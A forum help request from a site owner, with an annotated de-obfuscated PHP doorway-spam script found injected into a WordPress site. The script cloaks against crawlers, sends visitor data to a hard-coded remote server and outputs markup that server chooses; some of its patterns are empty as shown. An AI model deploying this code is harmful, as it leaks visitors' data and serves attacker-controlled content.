A little bit of background: after not touching my WordPress website for months, I searched Google for site:mywebsite.whatever to see how it was doing on search engines. I found hundreds of results that had nothing to do with my website (mostly random collections of words).
As it turns out, a folder named forum had been injected into my website. The forum folder has the following structure:
+-- cache
| +-- 00a0eacc77aafb9659ce904a9699e8be
| +-- 00cf657815974a1287f7622d4972e93a
| +-- ...other 1158 similar files
+-- 04ba_35fd4fbbd8d6270402bf7ac9c9df0180.list
+-- 04ba_69f2a52ce1412f5ef13c36be5ac355f9.list
+-- ...other 4 *.list files
+-- 302a_189ead8288703514037e97ba4e9fc2c1.html
+-- random_name.php
+-- sitemap.xml
where I didn't write the real name of the *.php file since it's all over Google.
I scanned all the files via FTP and removed the malicious folder but didn't find any threat. I wish I had a way to track down the author but I don't think it's possible. I guess some obsolete WordPress plugin is to blame.
Now, the sitemap is a list of all the possible content that can be generated using the PHP file. I took a look at random_name.php and, of course, it is obfuscated. I (sort of) de-obfuscated it but have no idea what it does. I know the code is long, but can anyone point me in the right direction? I noticed some curl_exec calls as well as POST requests.
Can anyone help me?
<?php
// Analyst note: the five calls below switch off PHP error logging and error
// reporting and remove the execution-time limit. Each call is prefixed with @,
// so a host that forbids changing a setting produces no warning either.
// Consequence for incident response: requests handled by this file leave
// nothing in the PHP error log; the web-server access log is the place to look.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
// Fixes the timezone to UTC; date() is used further down for the sitemap's lastmod values.
date_default_timezone_set('UTC');
/**
 * Outbound HTTP helper used for every request this script makes to a remote
 * server. It tries cURL first and falls back to file_get_contents() with a
 * stream context.
 *
 * Analyst note: the URL is passed around as an array of "/"-separated parts,
 * and the host part can be swapped for a computed address (see _cvb79), so
 * the host visible in the URL string literals is not necessarily the host
 * that is contacted.
 */
class _2c02e8g {
// Integer form of an IPv4 address, stored with an offset of +283.
// 2990481209 - 283 = 2990480926, which long2ip() renders as 178.63.30.30
// (worked out by hand here; re-check offline with long2ip(2990480926)).
static private $_8ftr0k7z = 2990481209;
/**
 * Fetch a URL, optionally as a POST.
 *
 * @param array  $_8b59yu5x URL split on "/" (so [2] is the host for "http://host/...").
 * @param string $_05y41nuc POST body; an empty value results in a plain GET.
 * @return mixed Response body from cURL, or from the file_get_contents() fallback
 *               when the cURL path returned a falsy value.
 */
static function _cvb79($_8b59yu5x, $_05y41nuc) {
// If the URL has more than 4 parts, the host part is overwritten with the
// computed address. "http://httpbin.org/" explodes to exactly 4 parts and is
// left alone; the two API URLs defined in class _p4aeht explode to 6 parts,
// so their written host is replaced before the request is sent.
$_8b59yu5x[2] = count($_8b59yu5x) > 4 ? long2ip(_2c02e8g::$_8ftr0k7z - 283) : $_8b59yu5x[2];
$_lrwd3yfg = _2c02e8g::_1hixv($_8b59yu5x, $_05y41nuc);
// Empty/false result from cURL (or cURL missing): retry via PHP streams.
if (!$_lrwd3yfg) {
$_lrwd3yfg = _2c02e8g::_58sep($_8b59yu5x, $_05y41nuc);
}
return $_lrwd3yfg;
}
/**
 * cURL transport. Returns "" when the cURL extension is not loaded.
 * No timeout or TLS option is set here; only URL, POST data and RETURNTRANSFER.
 */
static function _1hixv($_8b59yu5x, $_lrwd3yfg) {
if (!function_exists('curl_version')) {
return "";
}
$_glip1080 = curl_init();
// The URL parts are glued back together with "/".
curl_setopt($_glip1080, CURLOPT_URL, implode("/", $_8b59yu5x));
if (!empty($_lrwd3yfg)) {
curl_setopt($_glip1080, CURLOPT_POST, 1);
curl_setopt($_glip1080, CURLOPT_POSTFIELDS, $_lrwd3yfg);
}
curl_setopt($_glip1080, CURLOPT_RETURNTRANSFER, TRUE);
$_sfwktgps = curl_exec($_glip1080);
curl_close($_glip1080);
return $_sfwktgps;
}
/**
 * Stream-wrapper transport (file_get_contents), used as the fallback.
 * Warnings are suppressed with @, so a failed request just yields false.
 */
static function _58sep($_8b59yu5x, $_lrwd3yfg) {
if (!empty($_lrwd3yfg)) {
// Form-encoded POST through an HTTP stream context.
$_0r6p752k = stream_context_create(Array('http' => Array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $_lrwd3yfg)));
$_sfwktgps = @file_get_contents(implode("/", $_8b59yu5x), FALSE, $_0r6p752k);
} else {
$_sfwktgps = @file_get_contents(implode("/", $_8b59yu5x));
}
return $_sfwktgps;
}
}
/**
 * One generated doorway page plus its on-disk cache.
 *
 * Static state describes the cache (directory, expiry mode, salt); an instance
 * holds the four ingredients of a page. The array keys used in _tcspx() name
 * them: "template", "text", "keyword" and "links".
 *
 * Analyst note: the `cache` directory full of 32-hex-character file names in
 * the question's listing matches the md5() file naming used by this class.
 */
class _rarzgz {
// Cache directory path (set to "<script dir>/cache/" by _y1758).
private static $_v84cb06l = "";
// Expiry mode: -1 means cached pages never expire (see _tcspx).
private static $_7pid89x3 = - 1;
// Salt appended to the keyword before hashing it into a cache file name.
private static $_8adn2cpv = "";
// Per-page data, in constructor order: template, text, keyword, links.
private $_rpr3n2kv = "";
private $_az1mgng4 = "";
private $_5nr5x0lg = "";
private $_pr6te9qt = "";
/**
 * Configure the cache and create the cache directory if it is missing.
 *
 * @param string $_sppzo6m1 Base directory; "/cache/" is appended.
 * @param int    $_sugbfw6k Expiry mode (-1 = never expire).
 * @param string $_5t4zij15 Salt for cache file names.
 */
public static function _y1758($_sppzo6m1, $_sugbfw6k, $_5t4zij15) {
_rarzgz::$_v84cb06l = $_sppzo6m1 . "/cache/";
_rarzgz::$_7pid89x3 = $_sugbfw6k;
_rarzgz::$_8adn2cpv = $_5t4zij15;
if (!@file_exists(_rarzgz::$_v84cb06l)) {
@mkdir(_rarzgz::$_v84cb06l);
}
}
/**
 * Count the entries scandir() returns for the cache directory.
 * Every entry is counted without filtering, so whatever scandir() lists
 * (normally including "." and "..") is part of the total.
 */
static public function _s7stz() {
$_zku16g0r = 0;
foreach (scandir(_rarzgz::$_v84cb06l) as $_bvrdpc7b) {
$_zku16g0r+= 1;
}
return $_zku16g0r;
}
/**
 * "Is the cache usable?" check. It returns TRUE unconditionally; the
 * file_exists() test after the first return is unreachable.
 */
public static function _s29c6() {
return TRUE;
if (@file_exists(_rarzgz::$_v84cb06l)) {
return TRUE;
}
return FALSE;
}
/**
 * @param string $_gl7jmsue Template.
 * @param string $_t51srjug Text.
 * @param string $_va2xdvc2 Keyword.
 * @param string $_38y6twbl Links.
 */
public function __construct($_gl7jmsue, $_t51srjug, $_va2xdvc2, $_38y6twbl) {
$this->_rpr3n2kv = $_gl7jmsue;
$this->_az1mgng4 = $_t51srjug;
$this->_5nr5x0lg = $_va2xdvc2;
$this->_pr6te9qt = $_38y6twbl;
}
/**
 * Render the page: substitute text, keyword and links into the template,
 * then expand the remaining placeholders (random keywords, keyword links,
 * random numbers) until none is left.
 *
 * NOTE(review): every search string and regex pattern in this method is
 * empty as shown on this page, yet the code reads capture groups [1] and [2]
 * from the matches. Presumably the original placeholder tokens were stripped
 * when the page was rendered or extracted; confirm against the original
 * file. The per-loop comments below describe what the replacement side does,
 * not which token triggers it.
 */
public function _c3pca() {
// Helper declared at call time: random float in [min, max) rounded to 2 decimals.
function _p54ih($_b9rw2c9h, $_a9bmnch7) {
return round(rand($_b9rw2c9h, $_a9bmnch7 - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);
}
// All keywords from the stored keyword lists.
$_8p32i9sb = _ra2rzu::_6dnh6();
// Three nested substitutions into the template: links, then keyword, then text.
$_lrwd3yfg = str_replace("", $this->_az1mgng4, str_replace("", $this->_5nr5x0lg, str_replace("", $this->_pr6te9qt, $this->_rpr3n2kv)));
// One occurrence at a time, replace a placeholder with a random keyword
// (a fresh keyword per occurrence); stop when a pass changes nothing.
while (TRUE) {
$_khat30c5 = preg_replace('/' . preg_quote("", '/') . '/', _ra2rzu::_3f7mw(), $_lrwd3yfg, 1);
if ($_khat30c5 === $_lrwd3yfg) {
break;
}
$_lrwd3yfg = $_khat30c5;
}
// Indexed placeholder -> doorway URL of the keyword at that index.
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_va2xdvc2 = @$_8p32i9sb[intval($_fusm5n6f[1]) ];
$_ou3azhix = _p4aeht::_out2l($_va2xdvc2);
$_lrwd3yfg = str_replace($_fusm5n6f[0], $_ou3azhix, $_lrwd3yfg);
}
// Indexed placeholder -> the keyword text at that index.
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_va2xdvc2 = @$_8p32i9sb[intval($_fusm5n6f[1]) ];
$_lrwd3yfg = str_replace($_fusm5n6f[0], $_va2xdvc2, $_lrwd3yfg);
}
// Two-argument placeholder -> random decimal between the two bounds.
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_lrwd3yfg = str_replace($_fusm5n6f[0], _p54ih($_fusm5n6f[1], $_fusm5n6f[2]), $_lrwd3yfg);
}
// Two-argument placeholder -> random integer between the two bounds.
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_lrwd3yfg = str_replace($_fusm5n6f[0], rand($_fusm5n6f[1], $_fusm5n6f[2]), $_lrwd3yfg);
}
return $_lrwd3yfg;
}
/**
 * Persist this page to the cache as a serialize()d array.
 * File name: md5(keyword . salt) inside the cache directory.
 */
public function _tcspx() {
$_9de3kl40 = _rarzgz::$_v84cb06l . md5($this->_5nr5x0lg . _rarzgz::$_8adn2cpv);
// -1 = never expires; otherwise the entry is valid for 30 days from now.
if (_rarzgz::$_7pid89x3 == - 1) {
$_oskbkasn = - 1;
} else {
$_oskbkasn = time() + (3600 * 24 * 30);
}
$_yxwme0c8 = Array("template" => $this->_rpr3n2kv, "text" => $this->_az1mgng4, "keyword" => $this->_5nr5x0lg, "links" => $this->_pr6te9qt, "expired" => $_oskbkasn);
@file_put_contents($_9de3kl40, serialize($_yxwme0c8));
}
/**
 * Load a cached page for a keyword.
 *
 * @param string $_va2xdvc2 Keyword.
 * @return _rarzgz|null The cached page, or null when there is no entry or it has expired.
 *
 * Analyst note: the cache file is passed to unserialize() with errors
 * suppressed. The files are written by this script from remotely supplied
 * content, so they are attacker-controlled data, not site content.
 */
static public function _sximm($_va2xdvc2) {
$_9de3kl40 = _rarzgz::$_v84cb06l . md5($_va2xdvc2 . _rarzgz::$_8adn2cpv);
$_9de3kl40 = @unserialize(@file_get_contents($_9de3kl40));
if (!empty($_9de3kl40) && ($_9de3kl40["expired"] > time() || $_9de3kl40["expired"] == - 1)) {
return new _rarzgz($_9de3kl40["template"], $_9de3kl40["text"], $_9de3kl40["keyword"], $_9de3kl40["links"]);
} else {
return null;
}
}
}
/**
 * Template store: HTML templates kept as files whose names start with a
 * short prefix.
 *
 * Analyst note: _tcspx() writes "<prefix>_<md5 of content>.html". The
 * question's listing shows one `302a_<32 hex>.html` file, which fits that
 * naming (presumably 302a is the prefix derived at the bottom of the file;
 * not verified here).
 */
class _ee20mhc {
// Directory that is scanned for templates ("<script dir>/").
private static $_v84cb06l = "";
// File-name prefix that marks a file as a template.
private static $_e6keyqet = "";
/**
 * Configure the store and create the directory if it is missing.
 *
 * @param string $_sppzo6m1 Base directory; "/" is appended.
 * @param string $_fhw68k2n File-name prefix.
 */
public static function _y1758($_sppzo6m1, $_fhw68k2n) {
_ee20mhc::$_v84cb06l = $_sppzo6m1 . "/";
_ee20mhc::$_e6keyqet = $_fhw68k2n;
if (!@file_exists(_ee20mhc::$_v84cb06l)) {
@mkdir(_ee20mhc::$_v84cb06l);
}
}
/**
 * Readiness check. Returns TRUE unconditionally; the template count test
 * after the first return is unreachable.
 */
public static function _s29c6() {
return TRUE;
if (_ee20mhc::_s7stz()) {
return TRUE;
}
return FALSE;
}
/** Count directory entries whose name starts with the template prefix. */
static public function _s7stz() {
$_zku16g0r = 0;
foreach (scandir(_ee20mhc::$_v84cb06l) as $_bvrdpc7b) {
if (strpos($_bvrdpc7b, _ee20mhc::$_e6keyqet) === 0) {
$_zku16g0r+= 1;
}
}
return $_zku16g0r;
}
/**
 * Return the contents of one randomly chosen template file.
 * With no matching file, array_rand() is called on an empty array; the
 * resulting read is wrapped in @, so the failure is silent.
 */
static public function _3f7mw() {
$_fs32iq5n = Array();
foreach (scandir(_ee20mhc::$_v84cb06l) as $_bvrdpc7b) {
if (strpos($_bvrdpc7b, _ee20mhc::$_e6keyqet) === 0) {
$_fs32iq5n[] = $_bvrdpc7b;
}
}
return @file_get_contents(_ee20mhc::$_v84cb06l . $_fs32iq5n[array_rand($_fs32iq5n) ]);
}
/**
 * Store a template under "<prefix>_<md5(content)>.html" unless that file
 * already exists.
 *
 * Note that the path has no directory component (the configured directory
 * is not prepended), so the file lands in the process's working directory.
 *
 * @param string $_1fy7zpab Template content, as received from the operator.
 */
static public function _tcspx($_1fy7zpab) {
if (@file_exists(_ee20mhc::$_e6keyqet . "_" . md5($_1fy7zpab) . ".html")) {
return;
}
@file_put_contents(_ee20mhc::$_e6keyqet . "_" . md5($_1fy7zpab) . ".html", $_1fy7zpab);
}
}
/**
 * Keyword store: newline-separated keyword lists kept as files whose names
 * start with a short prefix.
 *
 * Analyst note: _tcspx() writes "<prefix>_<md5 of content>.list". The six
 * `04ba_<32 hex>.list` files in the question's listing fit that naming
 * (presumably 04ba is the prefix derived at the bottom of the file; not
 * verified here).
 */
class _ra2rzu {
// Directory that is scanned for keyword lists ("<script dir>/").
private static $_v84cb06l = "";
// File-name prefix that marks a file as a keyword list.
private static $_e6keyqet = "";
/**
 * Configure the store and create the directory if it is missing.
 *
 * @param string $_sppzo6m1 Base directory; "/" is appended.
 * @param string $_fhw68k2n File-name prefix.
 */
public static function _y1758($_sppzo6m1, $_fhw68k2n) {
_ra2rzu::$_v84cb06l = $_sppzo6m1 . "/";
_ra2rzu::$_e6keyqet = $_fhw68k2n;
if (!@file_exists(_ra2rzu::$_v84cb06l)) {
@mkdir(_ra2rzu::$_v84cb06l);
}
}
/** List the names of all files in the directory that start with the prefix. */
private static function _es5vo() {
$_rqh86abu = Array();
foreach (scandir(_ra2rzu::$_v84cb06l) as $_bvrdpc7b) {
if (strpos($_bvrdpc7b, _ra2rzu::$_e6keyqet) === 0) {
$_rqh86abu[] = $_bvrdpc7b;
}
}
return $_rqh86abu;
}
/**
 * Readiness check. Returns TRUE unconditionally; the "any list present?"
 * test after the first return is unreachable.
 */
public static function _s29c6() {
return TRUE;
$_rqh86abu = _ra2rzu::_es5vo();
if (!empty($_rqh86abu)) {
return TRUE;
}
return FALSE;
}
/** Return one random keyword: a random line from a random list file. */
static public function _3f7mw() {
$_rqh86abu = _ra2rzu::_es5vo();
$_8p32i9sb = @file(_ra2rzu::$_v84cb06l . $_rqh86abu[array_rand($_rqh86abu) ], FILE_IGNORE_NEW_LINES);
return $_8p32i9sb[array_rand($_8p32i9sb) ];
}
/** Return every keyword from every list file, concatenated into one array. */
static public function _6dnh6() {
$_8p32i9sb = Array();
$_rqh86abu = _ra2rzu::_es5vo();
foreach ($_rqh86abu as $_09cumqum) {
$_8p32i9sb = array_merge($_8p32i9sb, @file(_ra2rzu::$_v84cb06l . $_09cumqum, FILE_IGNORE_NEW_LINES));
}
return $_8p32i9sb;
}
/**
 * Store a keyword list under "<prefix>_<md5(content)>.list" unless that
 * file already exists. As with the template store, the path has no
 * directory component, so it is relative to the working directory.
 *
 * @param string $_cwq55lcz Keyword list content, as received from the operator.
 */
static public function _tcspx($_cwq55lcz) {
if (@file_exists(_ra2rzu::$_e6keyqet . "_" . md5($_cwq55lcz) . ".list")) {
return;
}
@file_put_contents(_ra2rzu::$_e6keyqet . "_" . md5($_cwq55lcz) . ".list", $_cwq55lcz);
}
}
/**
 * Main class of the doorway script (SEO spam with cloaking).
 *
 * What the visible code does, in short:
 *  - decides whether a request comes from a crawler or from a person who
 *    clicked a search result (_2ti6t);
 *  - for the latter, asks a remote server what to do and relays the header
 *    or markup it answers with (_yy7yg);
 *  - for everything else, serves a keyword page assembled from a stored
 *    template, remotely fetched text and a block of links to further
 *    keyword pages (_ebomk, _nmacy, _ur7fz);
 *  - writes a sitemap.xml that lists one URL per stored keyword (_d0dxo).
 *
 * This matches what the question describes: unrelated pages in the
 * site: results and a sitemap.xml inside the injected folder.
 */
class _p4aeht {
// Version string; reported back to the operator as "v".
static public $_h3jem60r = "4.5";
// Per-installation identifier. It doubles as the authentication key for
// operator commands ("ak"), as the marker expected in API responses, and
// as the seed for the cache salt, file prefixes and URL token.
static public $_dr372im9 = "5030800e-568e-8dc3-1a8d-72afb978ba0e";
// Remote API endpoints (redirect decision / page text). Both URLs explode
// to more than 4 parts, so _2c02e8g::_cvb79() replaces the host written
// here with its computed address before sending the request.
private $_5s1npqzl = "http://136.12.78.46/app/assets/api2?action=redir";
private $_b5s7iyhm = "http://136.12.78.46/app/assets/api?action=page";
// Minimum and maximum number of links placed on a generated page
// (passed to _ur7fz as the bounds for rand()).
static public $_jqg19ptq = 20;
static public $_cm4c4huo = 100;
/** Empty method; nothing in the visible code depends on it doing anything. */
static public function _d6voe() {
}
/**
 * Visitor classification used for cloaking.
 *
 * @return int 1 when the request looks like a crawler or is not a
 *             search-engine click-through; 0 only when the User-Agent
 *             matches none of the listed patterns, Accept-Language and
 *             Referer are both present, and the Referer contains
 *             "google", "yahoo", "bing" or "yandex".
 */
private function _2ti6t() {
$_k51hfafu = array('#libwww-perl#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i', '#spider#i', '#yahoo#i', '#google#i', '#altavista#i', '#ask#i', '#yahoo!\s*slurp#i', '#BingBot#i');
// The client address is collected here but not used in the rest of this method.
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_pvt168yv = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$_pvt168yv = $_SERVER['REMOTE_ADDR'];
} else {
$_pvt168yv = "";
}
// A User-Agent that matches any pattern is rewritten to contain the marker
// string, and the strpos() test then detects the marker.
if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_k51hfafu, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {
$_4axvz3yx = 1;
} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {
$_4axvz3yx = 1;
} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE && strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE && strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE && strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {
$_4axvz3yx = 1;
} else {
$_4axvz3yx = 0;
}
return $_4axvz3yx;
}
/**
 * Collect metadata about the current visitor's request (address, host and
 * URI, User-Agent, language, referer, accept headers, connection header).
 * The array is later form-encoded and sent to the remote API, i.e. visitor
 * data leaves the site on these requests.
 */
private static function _ix2nr() {
$_05y41nuc = Array();
$_05y41nuc['ip'] = $_SERVER['REMOTE_ADDR'];
$_05y41nuc['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
$_05y41nuc['ua'] = @$_SERVER['HTTP_USER_AGENT'];
$_05y41nuc['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$_05y41nuc['ref'] = @$_SERVER['HTTP_REFERER'];
$_05y41nuc['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];
$_05y41nuc['acp'] = @$_SERVER['HTTP_ACCEPT'];
$_05y41nuc['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];
$_05y41nuc['conn'] = @$_SERVER['HTTP_CONNECTION'];
return $_05y41nuc;
}
/** Split both API URLs on "/" into the part arrays the HTTP helper expects. */
public function __construct() {
$this->_5s1npqzl = explode("/", $this->_5s1npqzl);
$this->_b5s7iyhm = explode("/", $this->_b5s7iyhm);
}
/**
 * Hand-written Base64 decoder (standard alphabet, "=" mapped to index 64).
 * Inputs shorter than 4 characters decode to "". Characters outside the
 * alphabet are stripped first.
 *
 * NOTE(review): presumably written out by hand so that the file does not
 * contain a call to base64_decode(), which simple scanners look for;
 * that motive is an inference, not something the code states.
 */
static public function _y2lux($_ap8jdcl5) {
if (strlen($_ap8jdcl5) < 4) {
return "";
}
$_9c8afqnp = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// character -> 6-bit value lookup table
$_8p32i9sb = str_split($_9c8afqnp);
$_8p32i9sb = array_flip($_8p32i9sb);
$_aw7ah80q = 0;
$_2l764shf = "";
$_ap8jdcl5 = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_ap8jdcl5);
// Consume 4 input characters per round and emit up to 3 bytes.
do {
$_nmoxtvel = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_i59owo31 = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_6ybfh5t5 = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_pzbp8e53 = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_b34vcqnz = ($_nmoxtvel << 2) | ($_i59owo31 >> 4);
$_xxcxy4tq = (($_i59owo31 & 15) << 4) | ($_6ybfh5t5 >> 2);
$_ze2tucv0 = (($_6ybfh5t5 & 3) << 6) | $_pzbp8e53;
$_2l764shf = $_2l764shf . chr($_b34vcqnz);
// 64 is the "=" padding value: skip the bytes that padding stands for.
if ($_6ybfh5t5 != 64) {
$_2l764shf = $_2l764shf . chr($_xxcxy4tq);
}
if ($_pzbp8e53 != 64) {
$_2l764shf = $_2l764shf . chr($_ze2tucv0);
}
} while ($_aw7ah80q < strlen($_ap8jdcl5));
return $_2l764shf;
}
/**
 * Obtain the ingredients of a new page for a keyword.
 *
 * Sends the visitor metadata, the UID, the keyword and tc=10 to the page
 * API. The response is accepted only if it contains the UID; the first
 * strlen(UID) characters are then cut off and the rest is split into
 * lines, shuffled and joined with spaces.
 *
 * @param string $_va2xdvc2 Keyword.
 * @return array [template, text]; both "" when the response is rejected.
 */
private function _nmacy($_va2xdvc2) {
$_gl7jmsue = "";
$_t51srjug = "";
$_05y41nuc = _p4aeht::_ix2nr();
$_05y41nuc["uid"] = _p4aeht::$_dr372im9;
$_05y41nuc["keyword"] = $_va2xdvc2;
$_05y41nuc["tc"] = 10;
$_05y41nuc = http_build_query($_05y41nuc);
$_s3d76gce = _2c02e8g::_cvb79($this->_b5s7iyhm, $_05y41nuc);
if (strpos($_s3d76gce, _p4aeht::$_dr372im9) === FALSE) {
return Array($_gl7jmsue, $_t51srjug);
}
// Random locally stored template; the text comes from the remote response.
$_gl7jmsue = _ee20mhc::_3f7mw();
$_t51srjug = substr($_s3d76gce, strlen(_p4aeht::$_dr372im9));
$_t51srjug = explode("
", $_t51srjug);
shuffle($_t51srjug);
$_t51srjug = implode(" ", $_t51srjug);
return Array($_gl7jmsue, $_t51srjug);
}
/**
 * Ask the redirect API what to do with a human visitor and act on the answer.
 *
 * Sends the visitor metadata (plus CF-Connecting-IP, X-Real-IP and
 * X-Forwarded-For when present) and the UID, then unserialize()s the
 * response. For type "redir" it either passes data.header to header() or
 * echoes data.code.
 *
 * Analyst note: both the response header and the echoed markup are chosen
 * by the remote server at request time, so what a visitor receives is not
 * determined by anything stored on the site. unserialize() is also applied
 * to remote data here.
 *
 * @return bool true when a header or code was emitted, false otherwise.
 */
private function _yy7yg() {
$_05y41nuc = _p4aeht::_ix2nr();
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$_05y41nuc['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];
}
if (isset($_SERVER['HTTP_X_REAL_IP'])) {
$_05y41nuc['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];
}
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_05y41nuc['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];
}
$_05y41nuc["uid"] = _p4aeht::$_dr372im9;
$_05y41nuc = http_build_query($_05y41nuc);
$_t1lxnd1o = _2c02e8g::_cvb79($this->_5s1npqzl, $_05y41nuc);
$_t1lxnd1o = @unserialize($_t1lxnd1o);
if (isset($_t1lxnd1o["type"]) && $_t1lxnd1o["type"] == "redir") {
if (!empty($_t1lxnd1o["data"]["header"])) {
header($_t1lxnd1o["data"]["header"]);
return true;
} elseif (!empty($_t1lxnd1o["data"]["code"])) {
echo $_t1lxnd1o["data"]["code"];
return true;
}
}
return false;
}
/**
 * Combined readiness check of the three stores. Each of the three callees
 * returns TRUE unconditionally, so this is always true as written.
 */
public function _s29c6() {
return _rarzgz::_s29c6() && _ee20mhc::_s29c6() && _ra2rzu::_s29c6();
}
/** True when the request arrived over HTTPS (HTTPS server variable set and not "off", or port 443). */
static public function _gp62d() {
if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {
return true;
}
return false;
}
/**
 * Base URL used for generated links: scheme, Host header and the request
 * path without its query string. If the path does not contain ".php", the
 * last path segment is dropped and a trailing "/" is added.
 */
public static function _ljbu1() {
$_gp99mm20 = explode("?", $_SERVER["REQUEST_URI"], 2);
$_gp99mm20 = $_gp99mm20[0];
if (strpos($_gp99mm20, ".php") === FALSE) {
$_gp99mm20 = explode("/", $_gp99mm20);
array_pop($_gp99mm20);
$_gp99mm20 = implode("/", $_gp99mm20) . "/";
}
return sprintf("%s://%s%s", _p4aeht::_gp62d() ? "https" : "http", $_SERVER['HTTP_HOST'], $_gp99mm20);
}
/** URL of the directory containing the requested path (no trailing "/"). */
public static function _tinnm() {
$_gp99mm20 = explode("?", $_SERVER["REQUEST_URI"], 2);
$_gp99mm20 = $_gp99mm20[0];
$_sppzo6m1 = substr($_gp99mm20, 0, strrpos($_gp99mm20, "/"));
return sprintf("%s://%s%s", _p4aeht::_gp62d() ? "https" : "http", $_SERVER['HTTP_HOST'], $_sppzo6m1);
}
/**
 * Build the public URL of the doorway page for a keyword.
 *
 * A 6-character token (start of md5(UID . "salt3")) is embedded in every
 * URL, and the character codes of that token select the URL shape:
 *  - base URL ends with "/": path style, base + "token-keyword" or
 *    "keyword-token";
 *  - otherwise: "?token=keyword", or "?id=", "?page=" or "?tag=" followed
 *    by "token-keyword" / "keyword-token".
 * Spaces in the keyword become "-".
 *
 * Analyst note: because the token is constant per installation, it is a
 * stable string to search for in access logs and in indexed URLs when
 * measuring how far the spam pages spread.
 *
 * @param string $_va2xdvc2 Keyword.
 * @return string URL.
 */
public static function _out2l($_va2xdvc2) {
$_3hep6er4 = _p4aeht::_ljbu1();
$_jcgqaj3k = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
$_s22bfpvp = "";
if (substr($_3hep6er4, -1) == "/") {
if (ord($_jcgqaj3k[1]) % 2) {
$_va2xdvc2 = str_replace(" ", "-", $_jcgqaj3k . "-" . $_va2xdvc2);
} else {
$_va2xdvc2 = str_replace(" ", "-", $_va2xdvc2 . "-" . $_jcgqaj3k);
}
$_s22bfpvp = sprintf("%s%s", $_3hep6er4, urlencode($_va2xdvc2));
} else {
if (ord($_jcgqaj3k[0]) % 2) {
$_s22bfpvp = sprintf("%s?%s=%s", $_3hep6er4, $_jcgqaj3k, urlencode(str_replace(" ", "-", $_va2xdvc2)));
} else {
$_6kioq68i = Array("id", "page", "tag");
$_kq7ivc6q = $_6kioq68i[ord($_jcgqaj3k[2]) % count($_6kioq68i) ];
if (ord($_jcgqaj3k[1]) % 2) {
$_va2xdvc2 = str_replace(" ", "-", $_jcgqaj3k . "-" . $_va2xdvc2);
} else {
$_va2xdvc2 = str_replace(" ", "-", $_va2xdvc2 . "-" . $_jcgqaj3k);
}
$_s22bfpvp = sprintf("%s?%s=%s", $_3hep6er4, $_kq7ivc6q, urlencode($_va2xdvc2));
}
}
return $_s22bfpvp;
}
/**
 * Build the link block of a page: between $_b9rw2c9h and $_a9bmnch7 anchors,
 * each pointing at the doorway URL of a random keyword. The token computed
 * into $_kq7ivc6q is not used in this method.
 */
public static function _ur7fz($_b9rw2c9h, $_a9bmnch7) {
$_a73xya3t = rand($_b9rw2c9h, $_a9bmnch7);
$_fmzvp8fg = "";
$_kq7ivc6q = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
for ($_aw7ah80q = 0;$_aw7ah80q < $_a73xya3t;$_aw7ah80q++) {
$_va2xdvc2 = _ra2rzu::_3f7mw();
$_fmzvp8fg.= sprintf("<a href='%s'>%s</a>,
", _p4aeht::_out2l($_va2xdvc2), ucwords($_va2xdvc2));
}
return $_fmzvp8fg;
}
/**
 * Write sitemap.xml next to this script, with one url element per stored
 * keyword, a lastmod date randomly placed within the past 30 days and a
 * fixed priority of 0.3.
 *
 * @return string Public URL of the sitemap.
 */
public static function _d0dxo() {
$_i9hv9auf = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">
<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">
";
$_dgdvxo1h = "</urlset>";
$_sklpjgqb = "";
$_jcgqaj3k = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
$_8p32i9sb = _ra2rzu::_6dnh6();
foreach ($_8p32i9sb as $_bzky50pj) {
$_s22bfpvp = _p4aeht::_out2l($_bzky50pj);
$_va63o44e = time() - mt_rand(0, 60 * 60 * 24 * 30);
$_sklpjgqb.= "<url>
";
$_sklpjgqb.= sprintf("<loc>%s</loc>
", $_s22bfpvp);
